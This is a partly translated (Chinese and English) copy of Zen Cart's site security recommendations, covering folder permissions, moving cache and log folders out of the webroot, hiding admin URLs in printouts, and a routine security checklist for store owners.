[phpBB Debug] PHP Warning: in file [ROOT]/includes/crs/crs_misc_functions.php on line 37: mime_content_type(): Empty filename or path Zen Cart 源代码 important_site_security_recommendations.html
<h1>10. 保护 "images" 及其它目录 </h1>
During initial installation, you are advised to set your images folder to read/write, so that you can use the Admin interface to upload product/category images without having to use FTP for each one. Similar recommendations are made to other files for various reasons. <br>
<br>
However, leaving the images (or any other) folder in read/write mode means that hackers might be able to put malicious files in this (or other) folder(s) and thus create access points from which to attempt nasty exploits. <br>
<br>
Thus, once your site is built and your images have been created/loaded, you should drop the security down from read/write to read. ie: change from CHMOD 777 down to 644 for files, and to 755 for folders. <br>
<br>
<h4>文件/目录权限设置</h4>
<p>在 Linux/Unix 主机上,常用的权限安全建议设置为: </p>
<ul>
<li>目录: 755 </li>
<li>文件: 644 </li>
</ul>
<p>在 Windows 主机上,通常设置文件为只读就可以了。需要检查 <em>Internet Guest Account</em> 帐号被限制为(只读)。</p>
<h4>目录功能</h4>
<p>The folders for which installation suggests read-write access for setup are these. If your site supports .htaccess protection, then you should use it for these folders. (The .htaccess files included with v1.3.9 and newer should already cover the basics.) </p>
<ul>
<li><span class="filename">/cache</span><br>
This is used to cache database information. The BEST security protection for this is to move it to a folder "above" the webroot (public_html or htdocs or www) area, so that it's not accessible via a browser. (Requires changes to DIR_FS_SQL_CACHE setting in both configure.php files as well as the setting in your admin for Admin > Configuration > Sessions > Session Directory.)</li>
<li><span class="filename">/images</span><br>
本文前面有说明。</li>
<li><span class="filename">/includes/languages/english/html_includes</span><br>
本文前面有说明。</li>
<li><span class="filename">/logs</span><br>
This is used to store error logs. The BEST security protection for this is to move it to a folder "above" the webroot (public_html or htdocs or www) area, so that it's not accessible via a browser. (Requires changes to DIR_FS_LOGS setting in both configure.php files.)</li>
<li><span class="filename">/media</span><br>
This is only suggested read-write for the sake of being able to upload music-product media files via the admin. Could be done by FTP as an alternative. </li>
<li><span class="filename">/pub</span><br>
This is used on Linux/Unix hosts to have downloadable products made available to customers via a secure delivery method which doesn't disclose the 'real' location of files/data on your server (so that people can't share a URL and have their friends steal downloads from your site) </li>
<li><span class="filename">/admin/backups</span><br>
备份模块用于保存数据库备份,可选。</li>
<li><span class="filename">/admin/images/graphs</span><br>
This is used by the Admin > Tools > Banner Manager for updating/displaying bar graphs related to banner usage. If not writable, this feature is ignored. <br>
</li>
</ul>
<h1>11. 从浏览器头删除网址</h1>
<p>To stop the browser from printing a URL (which discloses your Admin foldername) on the invoice or any other document on the web, follow these steps:</p>
<p>针对 Internet Explorer:<br>
o 点击 File 然后 Page Setup <br>
o At page setup, remove this two character combination: "&u" from the header or footer text box. </p>
<p>针对 Firefox:<br>
o 点击 <em>File</em> 然后 <em>Page Setup<br>
o </em>On page setup window click on the tab "Margins & Header/Footer". In the "Header & Footer" section set all of the drop downs to --blank--. (Or at least remove all references to "Title" and "URL".)</p>
<h1>12. 需要经常检查的项目</h1>
<ol><li>Be sure you've done all the steps listed in this document</li>
<li>Keep good backups of your website files and database (frequently)<ul>
<li>Backup the database over a secure connection (ie: if you're using phpMyAdmin to backup, then make sure you're using HTTPS addresses in your URLs).</li>
<li>Backup the website files over a secure connection (If you're copying files via FTP, be sure to use SECURE-FTP <a href="http://en.wikipedia.org/wiki/FTPS" target="_blank">FTP over SSL/TLS</a>). A good tool that supports Secure FTP (SFTP) is WinSCP, provided you configure your connection in it accordingly.)</li>
<li>Store the backed up database and website files into an encrypted file. (You should NOT keep your backups on your server. But if you do, encrypt them securely. See your hosting company for advice.)</li></ul></li>
<li>Check your server's errorlog regularly for odd or suspicious activity (Your hosting control panel should give you access to the Apache error_log)<ul>
<li>look for any links that went to a page that isn't in your site
<li>look for links that have http after the index.php </li></ul>
<li>Check your website files regularly to be sure nothing's been added or altered
<li>Ask your webhost what they have done to be sure the server you're on is safe and secure so that outsiders cannot do any harm, and so that other websites on your server cannot be used to get to your site and cause any harm (in case they have security holes in them)
<li>If your business warrants, or you still want additional assurance (esp if running forum software on your site, or other scripts outside of Zen Cart®), hire a security consultant to check your site regularly and give you peace of mind in exchange for a few dollars </li>
<li>Check your Zen Cart /cache/ folder for leftover files that don't belong there.</li>
<li>Check your Zen Cart /logs/ folder for myDebug-XXXXX.log files to see whether any errors are happening which need to be fixed. Delete the log files after you've addressed the errors.</li>
</ol><br>
</fieldset>